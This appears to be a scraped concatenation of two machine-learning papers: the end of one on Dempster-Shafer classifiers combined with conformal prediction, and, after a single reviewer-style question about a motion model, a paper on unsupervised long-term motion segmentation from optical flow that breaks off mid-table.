additional perturbation, the Softmax Classifier assigns high probability to the wrong label while both DS Classifiers assign high mass / plausibility to the correct outcome. Especially for the $n$-dimensional DS classifier, this example emphasizes the influence of the loss function in eq. (9), which fundamentally distinguishes this approach from the Softmax Classifier (in addition to the modified activation function). Accordingly, a classifier which cannot reliably reflect epistemic uncertainty will be poorly calibratable via CP, meaning that a small $(1 - \alpha)$-quantile is obtained and prediction sets become large. We therefore argue that the obtained set size from CP can be utilized as an indication of the model’s ability to learn uncertainty. 5 Numerical Experiments In order to assess the capability of our method to capture predictive uncertainties, we employ it on several common datasets and benchmark it against a standard Softmax Classifier with temperature-scaling for which the CP calibration is done on the output of the true class. We conduct experiments on EMNIST (Cohen et al., 2017), GTSRB (Stallkamp et al., 2011) and CIFAR10 (Krizhevsky et al.). Figure 4: Average size of prediction sets resulting from conformal prediction at different confidence levels for four classes of (a) the EMNIST dataset (b) the GTSRB dataset and (c) the CIFAR10 dataset 1) without and 2) with additional perturbations applied to calibration and test images. Both of our proposed methods yield smaller or equally large sets at all confidence levels in unperturbed case, indicating more informative classifiers compared to the Softmax Classifier at different temperatures. Specifically, at large, application-relevant confidences, the gap in average set size between our approach and the reference method widens. In the scenario of enhanced epistemic uncertainty due to additional perturbation on calibration and test data average set sizes increase and the difference between the DS Classifiers and the Softmax Classifier in the set size grows, indicating that the DS Classifiers capture epistemic uncertainty more reliably. Our initial tests were conducted on a subset of four classes from each of the above datasets to be able to efficiently apply our first method with an exponentially large output layer in the number of classes. Class selection was done such that the learning task is as difficult as possible, i.e., the selected classes are as similar as possible. For instance, for CIFAR10 we choose the subset {airplane, automobile, ship, truck}. All training details can be found in Appendix A. The hyperparameter $\lambda$ in the loss functions (8) and (9) is optimized by means of a basic line search in order to achieve the smallest average set size. We find, however, that the performance is not highly sensitive to $\lambda$, meaning that two different values, for example 0.7 and 0.8, can achieve similarly small average set sizes. Thus, fine-tuning $\lambda$ is not required for the datasets studied. To obtain meaningful results, we analyze the average set size on the test data for all possible confidence levels $(1 - \alpha)$. Note that depending on the size of the calibration dataset, not all confidence levels can be achieved, as the $(1 - \alpha)$-quantile becomes inaccurate with few data and small $\alpha$. We observe that smaller (EMNIST, CIFAR10) or equal (GTSRB) average set sizes with the exponentially scaling DS Classifier as well as the n-dimensional DS classifier can be achieved compared to the Softmax Classifier with varying temperature, cf. Fig. 4. Both EMNIST and GTSRB are not considered complex datasets and therefore very small prediction sets are obtained with all methods. For the GTSRB dataset we find an average set size of smaller than one up to the plotted confidence of 97%. This can be accounted to a high test (and calibration) accuracy, which implies a $(1 - \alpha)$-quantile close to 1 and hence some test samples do not have a score that exceeds it, resulting in an empty prediction set. In order to test the ability of the classifiers to capture epistemic uncertainty, we perturb images in calibration and test set by randomly changing the brightness, contrast, saturation and hue of an image (GTSRB, CIFAR10) or by adding Gaussian blur with random variance (EMNIST). The models are still trained on unperturbed data, which effectively implies that calibration and test data are out-of-distribution and hence subject to higher epistemic uncertainty. In this scenario, it can be observed that the average set sizes obtained by CP are greater compared to the unperturbed case, since increased uncertainty results in the need to include more labels in the prediction set to achieve the desired confidence level, see Fig. 4). We find further that both DS Classifiers provide smaller, i.e., more informative average sets than the Softmax Classifier with varying temperature. Hence, one can conclude that DS approaches are able to return more reliable predictions in presence of epistemic uncertainty. To demonstrate the scalability of the n-dimensional DS Classifier, we next conduct experiments on the full GTSRB dataset with 43 classes. In situations of elevated epistemic uncertainty by perturbing images in calibration and test set, we find that the DS Classifier yields a significantly smaller average set size for all confidence levels compared to the Softmax Classifier, see Fig. 5. In particular, it is notable that the difference increases as the confidence level becomes larger. Achieving smaller average set sizes with the DS approaches compared to a Softmax Classifier with varying temperature, especially in the case of high epistemic uncertainty, supports the theoretical results of Bengs et al. (2022). Adapting the temperature, i.e., calibrating the Softmax Classifier is found not to be sufficient to reliably reflect epistemic uncertainty and obtain informative set predictions via CP. Hence, we empirically confirm the findings in Stutz et al. (2023), that CP benefits from a non-conformity measure capturing the uncertainty of the data. 6 CONCLUSION Our work addresses the task of achieving trustworthy predictions in machine learning by estimating predictive uncertainty. We propose the use of classifiers based on the framework of Dempster-Shafer theory to reliably reflect not only aleatoric but also epistemic uncertainty, while still being computationally efficient during inference. By using an implicit assumption on the presence of epistemic uncertainty, we design a loss function to train the DS Classifier and formulate a reduced approach to solve the scaling issue of DST classifiers. Combined with conformal prediction as a post-processing step, we demonstrate empirically on different datasets that - compared to a standard Softmax Classifier with temperature scaling - smaller and hence more informative prediction sets are retrieved, in particular in situations of high epistemic uncertainty. Our work indicates that while conformal prediction can always satisfy coverage guarantees (by returning the trivial set), the quality of the model to capture uncertainty is crucial to obtain informative set predictions. Most of the changes that our approach entails compared to Softmax Classifiers are made in the training phase, thus DS Classifiers may prove to be widely applicable when a characterization of the underlying uncertainties is crucial. 7 REPRODUCIBILITY STATEMENT Code is made available from the authors upon request. All training details can be found in Appendix A. REFERENCES Charu C. Aggarwal, Xiangnan Kong, Quanquan Gu, Jiawei Han, and S Yu Philip. Active Learning: A Survey. In Data Classification: Algorithms and Applications, pp. 571–605. Chapman and Hall/CRC Press, 2014. doi: https://doi.org/10.1201/b17320. Vineeth Balasubramanian, Shen-Shyang Ho, and Vladimir Vovk. Conformal Prediction for Reliable Machine Learning: Theory, Adaptations and Applications. Newnes, 2014. doi: https://doi.org/10.1016/C2012-0-00234-7. Stephen Bates, Anastasios Angelopoulos, Lihua Lei, Jitendra Malik, and Michael Jordan. Distribution-Free, Risk-Controlling Prediction Sets. Journal of the ACM (JACM), 68(6):1–34, 2021. doi: https://doi.org/10.1145/3478535. URL https://dl.acm.org/doi/10.1145/3478535. Viktor Bengs, Eyke Hüllermeier, and Willem Waegeman. Pitfalls of Epistemic Uncertainty Quantification through Loss Minimisation. In Neural Information Processing Systems, 2022. URL https://api.semanticscholar.org/CorpusID:252873697. Viktor Bengs, Eyke Hüllermeier, and Willem Waegeman. On Second-Order Scoring Rules for Epistemic Uncertainty Quantification. In Andreas Krause, Emma Brunskill, Kyunghyun Cho, Barbara Engelhardt, Sivan Sabato, and Jonathan Scarlett (eds.), Proceedings of the 40th International Conference on Machine Learning, volume 202 of Proceedings of Machine Learning Research, pp. 2078–2091. PMLR, 23–29 Jul 2023. URL https://proceedings.mlr.press/v202/bengs23a.html. Leo Breiman. Bagging Predictors. Machine learning, 24:123–140, 1996. doi: https://doi.org/10.1007/BF00058655. URL https://link.springer.com/article/10.1007/BF00058655. Leonardo Cella and Ryan Martin. Validity, consonant plausibility measures, and conformal prediction. International Journal of Approximate Reasoning, 141:110–130, 2022. ISSN 0888-613X. doi: https://doi.org/10.1016/j.ijar.2021.07.013. URL https://www.sciencedirect.com/science/article/pii/S0888613X21001195 Probability and Statistics: Foundations and History. In honor of Glenn Shafer. C. Chow. On Optimum Recognition Error and Reject Tradeoff. IEEE Transactions on Information Theory, 16(1):41–46, 1970. doi: 10.1109/TIT.1970.1054406. Gregory Cohen, Saeed Afshar, Jonathan Tapson, and André van Schaik. EMNIST: An Extension of MNIST to Handwritten Letters. CoRR, abs/1702.05373, 2017. URL http://arxiv.org/abs/1702.05373. Giorgio Corani and Marco Zaffalon. Learning Reliable Classifiers From Small or Incomplete Data Sets: The Naive Credal Classifier 2. Journal of Machine Learning Research, 9(4), 2008. Giorgio Corani and Marco Zaffalon. Lazy Naive Credal Classifier. In Proceedings of the 1st ACM SIGKDD Workshop on Knowledge Discovery from Uncertain Data, U ’09, pp. 30–37, New York, NY, USA, 2009. Association for Computing Machinery. ISBN 9781605586755. doi: 10.1145/1610555.1610560. URL https://doi.org/10.1145/1610555.1610560. Fabio Cuzzolin. Belief Functions: Theory and Applications, volume 8764. 09 2014. ISBN ISBN 978-3-319-11191-9. doi: 10.1007/978-3-319-11191-9. A. P. Dempster. Upper and Lower Probabilities Induced by a Multivalued Mapping. The Annals of Mathematical Statistics, 38(2):325–339, 1967a. ISSN 00034851. URL http://www.jstor.org/stable/2239146.
xUe1YqEgd6
What exactly is the motion model. It seems to be some kind of linear decomposition of the optical flow. is that correct? If so please clarify and denote all notation in Eq(2), for instance what is $n$?
UNSUPERVISED MOTION SEGMENTATION IN ONE GO: SMOOTH LONG-TERM MODEL OVER A VIDEO Anonymous authors Paper under double-blind review ABSTRACT Human beings have the ability to continuously analyze a video and immediately extract the main motion components. Motion segmentation methods often proceed frame by frame. We want to go beyond this classical paradigm, and perform the motion segmentation over a video sequence in one go. It will be a prominent added value for downstream computer vision tasks, and could provide a pretext criterion for unsupervised video representation learning. In this perspective, we propose a novel long-term spatio-temporal model operating in a totally unsupervised way. It takes as input the volume of consecutive optical flow (OF) fields, and delivers a volume of segments of coherent motion over the video. More specifically, we have designed a transformer-based network, where we leverage a mathematically well-founded framework, the Evidence Lower Bound (ELBO), to infer the loss function. The loss function combines a flow reconstruction term involving spatio-temporal parametric motion models combining, in a novel way, polynomial (quadratic) motion models for the \((x, y)\)-spatial dimensions and B-splines for the time dimension of the video sequence, and a regularization term enforcing temporal consistency on the masks. We report experiments on four VOS benchmarks with convincing quantitative results. We also highlight through visual results the key contributions on temporal consistency brought by our method. 1 INTRODUCTION When dealing with videos, motion segmentation is one of the key issues. Human beings have the ability to continuously analyze a video and immediately extract the main motion components. Computer vision methods usually proceed frame by frame. We want to go beyond this classical paradigm and segment the different motion entities in a video sequence in one go. We thus thoroughly investigate the temporal dimension of the motion segmentation problem. Since the optical flow (OF) yields all the information on the movement between two images of the video sequence, it is natural to base motion segmentation on optical flow. Motion segmentation is a computer vision task in its own, but it is also useful for diverse downstream tasks as independent moving object detection, object tracking, or action recognition, to name a few. It is also leveraged in video object segmentation (VOS), while most often coupled with appearance. The optical flow field at time \(t\) enables to get the segmentation at frame \(t\) of the video. However, taking a large time window, and even the whole video sequence, is beneficial, since motion entities are generally consistent throughout a video sequence (or at least within every video shot for long videos). Indeed, temporal coherence is inherent to motion. Therefore, it is essential that motion segmentation takes advantage of it, especially in a long-term perspective. In this paper, we propose an original holistic method for multiple motion segmentation from optical flow over a video sequence. To the best of our knowledge, our optical flow segmentation (OFS) method is the first fully unsupervised network to involve long-term temporal consistency, and to segment multiple motions in a video sequence in one go. The main contributions of our work are as follows. Our network takes as input a volume of consecutive optical flows, and delivers consistent motion segmentation maps throughout the video sequence. It involves a transformer module allowing for long-term interactons. It is trained in a completely unsupervised manner, without any manual annotation or ground truth data of any kind. The loss function is inferred by leveraging the Evidence Lower Bound (ELBO) framework, and comprises a flow reconstruction term with original spatio-temporal parametric motion models and an additional term enforcing temporal consistency on the segmentation masks. We model with B-splines the long-term temporal evolution of the motion model parameters. Our method also involves a latent representation of the segment motion augmented with positional embedding. The rest of the paper is organized as follows. Section 2 describes related work regarding motion segmentation. Section 3 presents our unsupervised network for multiple motion segmentation in one go, embedding long-term temporal consistency. In Section 4 we provide implementation details. Section 5 reports results on four VOS benchmarks with a comparison to state-of-the-art unsupervised motion segmentation methods. Finally, Section 6 contains concluding remarks. 2 RELATED WORK Motion segmentation aims to break down each frame of a video sequence into components (or segments) of coherent motion. Usually, each motion segment is identified by a motion model, which can be hand-crafted such as affine or quadratic polynomial models or sometimes learned. Motion segmentation has been investigated for decades [19, 23, 38]. However, we will focus on recent methods in this section. Since accurate and efficient methods for estimating optical flow are now available, motion segmentation methods can leverage optical flow as a reliable input. The advent of deep learning methods in computer vision, and more recently the use of transformer-based networks with attention mechanisms [11], has also encompassed motion segmentation. In [35], a transformer module, more specifically, the slot attention mechanism introduced in [18], is leveraged to perform motion segmentation from the optical flow. As a matter of fact, it addresses a binary segmentation problem, foreground moving object vs background. The loss function is composed of two terms, a flow reconstruction term and an entropy term to make masks as binary as possible. Another approach is adopted in [34] that is able to cope with multiple motion segmentation. Nonlinear subspace filters are learned from stacked deep multi-layer perceptrons. Then, motion segmentation is inferred at inference by applying K-means to the output embeddings. In [21], the Expectation-Maximization (EM) framework is leveraged to define the loss function and the training procedure for an unsupervised frame-by-frame motion segmentation, where 12-parameter quadratic motion models are involved. The same authors also proposed an extension of that method in [22] to better handle the temporal dimension of the problem, by considering triplets of flows as input. In [36], the authors developed an adversarial method whose aim is to generate a mask hiding the input optical flow, where an inpainter network attempts to recover the flow within the mask. The rationale is that no correct reconstruction of the inside flow can be achieved from the outside flow, if the hidden area exhibits an independent motion and then constitutes a motion segment. The temporal dimension of motion segmentation has been considered in various ways [30]. Regarding deep learning approaches, motion segmentation at time t is improved at training time in [35], by taking, as input, flows between t and several time instants before and after t. The authors of [8] consider several consecutive RGB frames as input of their self-supervised method. Optical flow is only computed at training time, and the loss function also comprises a temporal consistency term. However, the latter is not applied to two consecutive segmentation masks, but for pairings between the same frame t and another (more or less distant) one. In [9], spatio-temporal transformers were designed for video object segmentation involving temporal feature propagation. VOS usually requires motion segmentation, often coupled with appearance [5, 10, 37]. It was addressed with supervised or semi-supervised methods as in [7, 9, 12], but also with unsupervised methods [36, 35, 21]. VOS is concerned with the segmentation of primary objects, i.e., object moving in the foreground of a scene and possibly tracked by the camera [39]. Thus, VOS generally involves binary ground truth segregating primary moving object against background. This is for instance the case for the DAVIS2016 benchmark [26]. Recent works have revisited the way of coupling appearance and motion for VOS. The AMD method [17] includes two pathways, the appearance one and the motion one. If it does not use optical flow as input and brings out the objectness concept, it nevertheless relies on a coarse motion representation. The RCF method [16] involves learnable motion models, and is structured in two stages, a motion-supervised object discovery stage, and then, a refinement stage with residual motion prediction and high-level appearance supervision. However, the method cannot distinguish objects undergoing different motions. In [6], the prediction of probable motion patterns is used at the training stage as a cue to learn objectness from videos. Divided attention is promoted in (14). The resulting DivA method is based on the same principle as in (36) that motion segments are mutually uninformative. However, it is not limited to binary segmentation. It can segment a variable number of moving objects from optical flow, by leveraging a slot attention mechanism guided by the image content through a cross-modal conditional slot decoder. Our fully unsupervised approach differs from these previous works in several respects. We rely only on optical flow and take a volume of OF fields as input, providing a volume of consistent segmentation maps. We introduce B-splines to define parametric motion models able to correctly handle motion evolution over time, and we express long-term temporal consistency. We infer the loss function from the Evidence Lower Bound (ELBO) framework. In (22), the authors also deal with temporal consistency. However, they only took a triplet of optical flow fields as input, they did not resort to transformers, and the temporal part of the motion model was just a linear (first-order polynomial) model in time. In addition, their temporal linkage of the consecutive motion segmentations over a video sequence was an ad hoc post-processing. In contrast, we define a fully integrated long-term model that is end-to-end trained in an unsupervisedly way. We will call our method LT-MS method, for long-term motion segmentation, and in contrast, we will refer to the method (22) as the ST-MS method, for short-term motion segmentation. 3 Long-term Motion Segmentation Method We have designed a transformer-based network for multiple motion segmentation from optical flow. It is inspired from the MaskFormer architecture (4), but it only comprises one head corresponding to the mask prediction, as described in Fig.1. The network takes as input a volume, of flexible temporal length, comprising several consecutive optical flow fields. Temporal consistency is expressed in two main ways at the training stage. Firstly, we associate a space-time motion model with each segment to characterize its motion along with the evolution of the latter over time. Secondly, the loss function comprises an additional term enforcing consistent labeling of the motion segments over the volume. ![Figure 1](image) Figure 1: Overall architecture of our multiple motion segmentation method ensuring temporal consistency with the loss term $L_c$ and the B-spline space-time motion models $\theta_k$ (for $k = 1, \ldots, K$). It takes as input a volume of $T$ flow fields. It comprises a 3D U-net ($e$ and $d$ boxes) and a transformer decoder ($t$ box). It also involves positional encoding. A cross-attention product yields the $K$ segmentation masks corresponding to the input volume For the sake of clarity, the block diagram is represented for three motion segments ($K = 3$). $L_r$ is the flow-reconstruction loss term. 3.1 Spatio-temporal Parametric Motion Model The set of $T$ consecutive flows will be designated as a space-time volume (or volume, to make it short). The volume could even be the whole video sequence. Our space-time motion model is estimated through B-spline functions (32). We assign a spatio-temporal parametric motion model $\hat{f}_{\theta_k}$ to each motion segment $k$, $k = 1, \ldots, K$. $\theta_k$ specifies the motion model $f$ for segment $k$. The motion model involves $J$ parameters and each parameter $\theta_{kj}$, $j = 1, \ldots, J$, of the model results from a B-spline function of order $n$ in the variable $t$ over the space-time volume. In practice, we take $n = 3$. The number $L$ of control points is given by $L = 2 + \lfloor \frac{T-2}{\nu} \rfloor$, where $\nu$ allows us to set the temporal frequency of control points. We put a control point at both ends of the volume (at $t = 1$ and $t = T$), and the other control points are equidistantly placed between the two. Most often, the control points are not located at time points of the video sequence. The space-time spline-based motion model is illustrated in Fig. 2. Just for this illustration, the motion models are computed within the two segments, foreground moving object and background, provided by the ground truth. The estimated motion model for the foreground moving object is able to capture the periodic nature of the swing motion as demonstrated by the plots of the computed motion model parameters. Also, the motion model computed in the background segment perfectly fits the camera motion. Articulated motion (woman’s legs) would require multiple-motion segmentation. ![Figure 2](image) **Figure 2:** Illustration of the spatiotemporal spline-based motion model. Top row: input flows displayed with the HSV code for the *swing* video of DAVIS2016 dataset, binary segmentation ground truth, flows generated by the estimated spline-based motion models for the two segments. Bottom row: plot of the temporal evolution of the six estimated model parameters corresponding to the flow $u$-coordinate for the foreground moving object. Any parametric motion model could be considered. We use the 12-parameter quadratic motion model to be able to account for continuously varying depth surface of the objects in the scene, especially for the whole background, and for complex object or camera motions. In contrast, the affine and the 8-parameter quadratic motion models assume a planar object surface. Indeed, the latter exactly corresponds to the projection in the image of the 3D rigid motion of a planar surface. It is equivalent for velocity fields to the homography transform. However, in presence of severe depth effects (strong depth discontinuities) and camera motion, the static scene cannot be represented by a single motion model due to motion parallax produced by static objects located in the foreground. Regarding first the spatial dimension of the motion model, the 2D flow vector yielded by the full quadratic motion model at point $(x, y)$ writes: $$\tilde{f}_\theta(x, y) = (\theta_1 + \theta_2 x + \theta_3 y + \theta_7 x^2 + \theta_8 xy + \theta_9 y^2, \theta_4 + \theta_5 x + \theta_6 y + \theta_{10} x^2 + \theta_{11} xy + \theta_{12} y^2)^T.$$ (1) To correctly handle complex temporal evolution, we resort to the spline approximation as aforementioned. By denoting now $S_n(\theta_k)$ the subscript of $\tilde{f}$, we emphasize that the motion model parameters for each segment $k$ are estimated through the B-spline functions. More specifically, we have: $$\tilde{f}_{S_n(\theta_k)}(i, t) = \sum_{l=1}^{L} \tilde{f}_{\theta_{k,l}}(i, t) B_{n,l}(t),$$ (2) where $B_{n,l}$ is the $l^{th}$ B-spline and $\theta_{k,l}$ corresponds to the $l^{th}$ control point of the spline function. ### 3.2 Loss Function We consider a volume of optical flow fields $f \in \mathbb{R}^{2 \times T \times W \times H}$, the spatial grid $\Omega \in \mathbb{R}^{W \times H}$ and $T$ temporal steps. We denote $f(i, t) \in \mathbb{R}^2$ the flow associated to site $i \in \Omega$ at time $t$. We assume that we can decompose the flow as a set of $K$ segments, each one exhibiting a coherent motion. Flow vectors within a given segment $k$ are represented by a smooth parametric motion model parametrized by $\vartheta_k$. Variable $z_{i,t}$ conveys the motion segmentation, $z_{i,t}^k = 1$ if site $(i, t)$ belongs to segment $k$. $z$ and $\vartheta = \{\vartheta_k, k = 1 \cdots K\}$ are latent variables, and $f$ is the observed data. Following (13), we introduce an approximate distribution over segmentation and motion model parameters: $$q(z, \vartheta | f) = q(z | f) q(\vartheta) = \left( \prod_{t=1}^{T} \prod_{i \in \Omega} \prod_{k=1}^{K} q(z_{i,t}^k | f) \right) \left( \prod_{k} q(\vartheta_k) \right),$$ (3) where \( q(\vartheta_k) \triangleq \delta(\theta_k) \) with \( \delta \) the dirac distribution and \( q(z_{i,t}^k|f) = g_\phi(f)_{i,t}^k \cdot g_\phi \) is our network model taking as input the optical flow volume and returning a probabilistic segmentation volume. We can also write the data-likelihood over a dataset \( D \) of optical flow volumes \( f \) as: \[ \log(D) = \sum_{f \in D} \log p(f) = \sum_{f \in D} (\mathbb{E}_{q(z,\vartheta|f)}[\log \frac{p(f,z,\vartheta)}{q(z,\vartheta|f)}] + KL(q(z,\vartheta|f)||p(z,\vartheta|f))) \geq \sum_{f \in D} (\mathbb{E}_{q(z,\vartheta|f)}[\log p(f|z,\vartheta)] - KL(q(z,\vartheta|f)||p(z,\vartheta))), \] (4) where we obtain the Evidence Lower Bound (ELBO). Following the assumption stated above, we can write our likelihood as: \[ p(f|z,\vartheta) = \prod_{t=1}^{T} \prod_{k=1}^{K} p(f(t)|\vartheta_k,z) \propto \prod_{t=1}^{T} \prod_{k=1}^{K} \prod_{i \in \Omega} \exp(-||f(i,t) - \tilde{f}_{S_n(\vartheta_k)}(i,t)||_1/\xi_{f,t}) z_{i,t}^k, \] (5) where \( \tilde{f}_{S_n(\vartheta_k)}(i,t) \) is the flow vector given by the parametric motion model of parameters \( \vartheta_k \) at point \((i,t)\) as defined in Section [3.1] through the spline approximation and \( \xi_{f,t} = \sum_i ||f(i,t)||_1 \) is a normalizing factor. From this likelihood, we can write the left term of the ELBO as: \[ L_r = \mathbb{E}_{q(z,\vartheta|f)}[\log p(f|z,\vartheta)] = \sum_{t=1}^{T} \sum_{k} \mathbb{E}_q[\log p(f(t)|\vartheta_k,z)] = -\sum_{t=1}^{T} \sum_{i \in \Omega} \sum_{k} g_\phi(f)_{i,t}^k ||f(i,t) - \tilde{f}_{S_n(\vartheta_k)}(i,t)||_1/\xi_{f,t} \] (6) The term \( KL(q(z,\vartheta|f)||p(z,\vartheta)) \) allows us to define a prior over the segmentation. We want to enforce the property that the segmentation labels are temporally consistent, i.e., similar between neighbouring frames. We approximate this term using the temporal consistency loss defined in (22), as it showed good experimental results and was efficient to compute at training time: \[ L_c = \frac{1}{2K|I|} \sum_{i \in \Omega} \sum_{t=2}^{T} \mathbb{1}[||f_{i,t} - f_{i,t-1}||_1 < \lambda] \sum_{k=1}^{K} |g_\phi(f)_{i,t}^k - g_\phi(f)_{i,t-1}^k|, \] (7) The threshold \( \lambda \) allows us to discard occlusion areas. The loss function is thus defined by: \[ \sum_{f \in D} L(f,\phi,\theta) = \sum_{f \in D} L_r(f,\phi,\theta) + \beta L_c(f,\phi). \] (8) We set \( \beta = 1 \). The training procedure alternatively updates \( \theta \) and \( \phi \) with \( \alpha \) as learning rate: \[ \text{for } f \in D : \quad \theta^* = \arg \min_\theta L(f,\phi,\theta)(f); \quad \phi_{t+1} = \phi_t - \alpha \nabla_\phi L(f,\phi,\theta^*) \] (9) ### 3.3 Network Architecture The overall architecture of our unsupervised multiple motion segmentation framework is illustrated in Fig. It includes two main modules. The first one, taking the flow volume as input, is a 3D U-net (29). The latent code augmented with embedding positions is directed to the transformer decoder. Then, by cross-attention, the output formed by the volume of segmentation masks is produced. The training of the overall architecture is based on the minimization of the loss function defined below, while the motion model parameters of the segments are given by the B-spline estimation. Temporal consistency is provided by the loss function and the space-time motion models. ### 4 Implementation #### 4.1 Implementation Details Following (6, 16, 21, 22, 35), we adopt the RAFT method (31) to compute the optical flow fields. More specifically, we use the RAFT version trained on the MPI Sintel dataset (2). We downsample the computed flow fields to feed the network with $128 \times 224$ vector fields. The output segmentation maps are upsampled to the initial frame size for evaluation. Thus, we can perform efficient training and inference stages. We typically take flow volumes of temporal length $T = 9$ at training time. However, at test time, we can process flow volumes of larger temporal length, and even the flow volume of the whole sequence. To compute of the spatio-temporal parametric motion models, $x$ and $y$ coordinates are normalized within $[-1, 1]$, and a similar normalization is applied to the $t$ coordinate. The full 12-parameter quadratic motion model is chosen in all the experiments, and we take $\nu = 3$ for the frequency factor in the B-spline approximation. We select for each site $i$ the segment $\hat{k}$ with the highest prediction. In eq.(7), we set $\lambda$ as the 99th quantile of the flow differences over the flow volume. Our LT-MS method is very efficient at test time. The computational time amounts on average to 210 fps on a GPU P100, that is, twice as fast as the ST-MS method (22). It is certainly due to the long flow sequence given as input to the network, which allows for parallelisation of some heavy computations. In addition, our LT-MS architecture remains lightweight, since it combines only three Unet layers and a transformer decoder on the downsampled feature space. Let us also stress that our LT-MS method does not involve any post-processing at all. ### 4.2 Data Augmentation and Network Training We applied two types of data augmentation dedicated to optical flow. First, we add a global flow to the input flow similarly as in the EM (21) and ST-MS (22) methods. However, in our case, the global flow is given by a full spline-based spatio-temporal motion model whose parameters are chosen at random. The same global flow is added to the flow fields of a given input volume. It allows us to mimic diverse camera motions, enforcing that the motion segments are independent of it. In addition, we corrupt a few flows out of the nine input ones. Thus, we simulate poorly estimated flow fields at some time instants, and the temporal consistency should overcome it. Our motion segmentation method is fully unsupervised. We never use any manual annotation. We train our model only with the FlyingThings3D (FT3D) dataset (20), whatever the dataset considered at test time. This ensures that our LT-MS network generalizes well to unseen datasets. Regarding hyperparameter setting, we select the stopping epoch from the loss function evaluated on the DAVIS2016 training set. Additional information on the optimization stage is given in the Appendix. ## 5 Experimental Results We have carried out comparative experiments on four datasets: DAVIS2016[^1], SegTrackV2[^2], FBMS59 (24), and DAVIS2017-motion (33). More information on the datasets is provided in the Appendix. ### 5.1 Ablation Study We have conducted an ablation study to assess three main components of our method LT-MS with four masks ($K = 4$), in particular related to the temporal dimension of the problem. We have changed one component at a time as specified hereafter. We use the polynomial space-time quadratic motion model of ST-MS (22) instead of the space-time motion model based on B-splines over the input sequence. We omit the consistency term $L_c$ in the loss function. We just take the convnet without the transformer decoder. All the ablation experiments were run on the three datasets, DAVIS2016, FBMS59, SegTrackV2. Results are collected in Table 1. In addition, we performed them for two input sequence configurations, respectively input sequences of ten flows, and input sequence of 120 flows (in practice, the whole video for the DAVIS2016 dataset). We can observe that the three ablations have almost the same impact on the performance. The three corresponding model components, i.e., the spline-based motion model, the temporal-consistency loss term, and the transformer decoder are thus all beneficial in similar proportions. They are able to handle the temporal dimension of the problem and the temporal motion evolution along the sequence in a compelling way. Admittedly, the contributions of these three components are more significant for the FBMS59 and the SegTrackV2. [^1]: https://davischallenge.org/index.html [^2]: https://paperswithcode.com/dataset/segtrack-v2-1 Table 1: Ablation study for three main components of our method LT-MS ($K = 4$) on DAVIS2016, FBMS59 and SegTrackV2. Only one model component is modified at a time. The performance scores are given by the Jaccard index $J$. We report ablation results with two input-flow sequence length (or cut size), respectively, by dividing the video into pieces of ten successive frames or by considering 120 successive frames (in practice, the whole video for DAVIS2016). | Ablation / Dataset | DAVIS2016 | FBMS59 | SegTrackv2 | |-----------------------------|-----------|--------|------------| | Cut Size | 10 | 120 | 10 | 120 | 10 | 120 | | Full Model LT-MS-K4 | 74.8 | 72.4 | 61.0 | 58.2 | 61.3 | 60.4 | | Unet3D only | 73.0 | 71.3 | 56.6 | 55.5 | 58.2 | 57.3 | | No consistency term $L_c$ | 73.5 | 71.0 | 57.5 | 55.5 | 58.0 | 57.5 | | Polynomial space-time quadratic model | 73.4 | 69.8 | 57.4 | 54.5 | 57.8 | 56.6 | Datasets. However, the dynamic content of the majority of the DAVIS2016 videos, and then, the overall performance score, cannot allow us to fully appreciate the contributions of these three model components. Yet, they can be acknowledged by visualizing results obtained on some videos of DAVIS2016, as shown in the Appendix. 5.2 Quantitative and Comparative Evaluation We report in Table 2 the results obtained by two versions of our LT-MS method on the three datasets DAVIS2016, SegTrackV2, and FBMS59. LT-MS-K2 performs segmentation with only two masks ($K = 2$) while LT-MS-K4 involves four masks ($K = 4$). Table 2 collects results obtained by our LT-MS method and other existing unsupervised methods, when available. We follow the categorization proposed in (21) regarding input and training. However, we have added a category w.r.t. the network input for four recent methods, (6, 8, 16, 17), that only use RGB images as input at test time, the optical flow being only involved in the loss function. Evaluation is performed on the binary ground truth (foreground moving object vs background) for the three datasets. In the Appendix, we explain how we select the segments for the binary evaluation from the multiple motion segments delivered by our LT-MS method. We still put the OCLR method (33) in the category of unsupervised methods, whereas the authors of the DivA method (14) did not. Indeed, OCLR is not fully unsupervised, since it relies on human-annotated sprites to include realistic shapes in the computer-generated data used at training time. We consider the OCLR version taking only optical flow as input. The post-processing added to the CIS method (36), based on Conditional Random Fields (CRF), is an heavy one, which leads most authors to retain only the version without post-processing for a fair comparison. As shown in Table 2, our LT-MS method provides very convincing results, both for LT-MS-K2 and LT-MS-K4, in the category of unsupervised methods based on optical flow only. OCLR and DivA demonstrate better performance on the SegTrackV2 dataset. However, as aforementioned, OCLR is not a fully unsupervised method, while DivA leverages RGB images in its conditional decoder. In addition, DivA, along with MoSeg and CIS methods, takes multi-step flows as input between $t$ and in turn $t+1$, $t+2$, $t-1$, $t-2$, and averages the four corresponding predictions to get the final result. SegTrackV2 includes sequences acquired with a poorly controlled handheld camera, which leads to unstable sequences where the contribution of our method is therefore less likely to be emphasized. Overall, temporal consistency is properly handled over long temporal periods by our LT-MS method. Beyond segmentation performance, we want to stress that our method is the only one providing by design a coherent segmentation over the sequence, which is a significant added value. Thus, we can claim that we have not only segmented the moving objects throughout the sequence, but also achieved some kind of tracking. 5.3 Multi-segment Evaluation We have also performed the evaluation of multiple motion segmentation for a multi-segment setting. Since multiple-motion segmentation is harder than the binary motion segmentation (moving foreground vs background), accuracy scores are expected to decrease for all methods. In Table 3, we report comparative results on the DAVIS2017-motion dataset and on FBMS59. As for the other methods, we performed segmentation with three masks. To this end, we finetuned the LT-MS-K4 Table 2: Results obtained with two versions of our LT-MS method on DAVIS2016, SegTrackV2, FBMS59. LT-MS-K2 performs segmentation with two masks ($K = 2$), and LT-MS-K4 involves four masks ($K = 4$). We include comparison with unsupervised methods (scores from cited articles). All scores correspond to evaluation on the binary ground-truth. For LT-MS-K4 and LT-MS-K2, we report results obtained with a cut size of 10. Results with a cut size of 120 are given for LT-MS-K4 in Table 1 with very close performance (additional results on this point in the Appendix). The Jaccard index $J$ is the intersection over union between the extracted segments and the ground truth, while $F$ focuses on segment boundary accuracy. Performance is assessed by the average score over all samples, for all datasets but DAVIS2016. For the latter, the overall score is given by the average of sequence scores. *Actually, putting OCLR as an unsupervised method can be questionable (see main text). †DivA somehow uses RGB input since its conditional decoder leverages input images. | Method | Training | Input | DAVIS2016 | SegTrack V2 | FBMS59 | |-----------------|--------------|-------------|-----------|-------------|--------| | **Ours LT-MS-K4** | Unsupervised | Flow | 74.8 | 72.2 | 61.3 | | **Ours LT-MS-K2** | | | 70.3 | 68.5 | 58.6 | | ST-MS (4 masks) | | | 73.2 | 